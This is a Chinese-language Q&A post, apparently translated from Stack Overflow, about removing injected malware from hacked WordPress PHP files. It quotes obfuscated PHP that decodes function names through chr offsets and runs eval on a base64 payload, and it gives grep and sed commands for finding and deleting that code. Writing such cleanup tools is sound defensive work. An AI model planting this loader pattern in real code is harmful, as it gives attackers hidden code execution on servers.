通过ssh和grep查找和替换变量数据

时间:2013-12-14 19:13:33

标签: wordpress security ssh sed grep

我的服务器被黑客攻击了多个博客,我正在尝试找到一个字符串并替换它。这个hack比我遇到的其他的更复杂,因为它的变量。但是有些数据是静态的。以下是我查找受感染文件的方法:

find . | xargs grep -lr "ZXZhbChiYXNlNjRfZGVj" *

正在搜索已注入的文件:

<?phpcVbHvpF09zNSRuMPElLr= array('6169','6186','6165','6176');$SxaHy7s95ObQQJc6f36EGOm= array('1841','1856','1843','1839','1858','1843','1837','1844','1859','1852','1841','1858','1847','1853','1852');$u2vCEM8399Ax6Tw2y= array('9732','9731','9749','9735','9688','9686','9729','9734','9735','9733','9745','9734','9735');$YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL="";if (!function_exists("OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p")){ function OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq,$onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML){$y22XerQlngnbDyg7CyDCKnrKBrhh3Sz = '';foreach($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq as $xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4){$y22XerQlngnbDyg7CyDCKnrKBrhh3Sz .= chr($xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4 - $onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML);}return $y22XerQlngnbDyg7CyDCKnrKBrhh3Sz;}$AQnCMAhdS9buT = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($AcVbHvpF09zNSRuMPElLr,6068);$Eg0IMt83iZbOJYNZ = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($SxaHy7s95ObQQJc6f36EGOm,1742);$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($u2vCEM8399Ax6Tw2y,9634);$FbaILfyEjiFc3kFDDXNL = $Eg0IMt83iZbOJYNZ('$kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ',$AQnCMAhdS9buT.'('.$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt.'($kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ));');$FbaILfyEjiFc3kFDDXNL($YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL);}?>

但是,数组是随机生成的,您可以在部分代码中看到:

<?phppNSU= array('7868','7885','7864','7875');$ARi0VuBPLRN7WHIEO71nzE7UGX9k= array('2235','2250','2237','2233','2252','2237','2231','2238','2253','2246','2235','2252','2241','2247','2246');$uWbB41mot20bGXYdwsStk5TO2DlQDwlninPce1r= array('4815','4814','4832','4818','4771','4769','4812','4817','4818','4816','4828','4817','4818');$rCeok2zh4L1E8X6GuemL4rp7ve3LRhyxJCMT="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelp

因此它总是在第一个<?php标记内,所以我想知道是否可以使用“ZXZhbChiYXNlNjRfZGVj”作为常量搜索受感染的文件,然后删除<?php的第一个实例和?>,因为恶意代码总是在它之间。不确定这是否可行。

想法?

1 个答案:

答案 0 :(得分:0)

将此文件作为filter.sed

:t
/<?php/,/?>/ {                    # For each line between these block markers..
   /?>/!{                         #   If we are not at the end marker
      $!{                         #     nor the last line of the file,
         N;                       #     add the Next line to the pattern space
         bt
      }                           #   and branch (loop back) to the :t label.
   }                              # This line matches the /end/ marker.
   /ZXZhbChiYXNlNjRfZGVj/d;       # If /regex/ matches, delete the block.
}                                 # Otherwise, the block will be printed.

然后,从您的PHP文件所在的目录:

sed -i -f filter.sed *.php

提供this优秀资源的提示。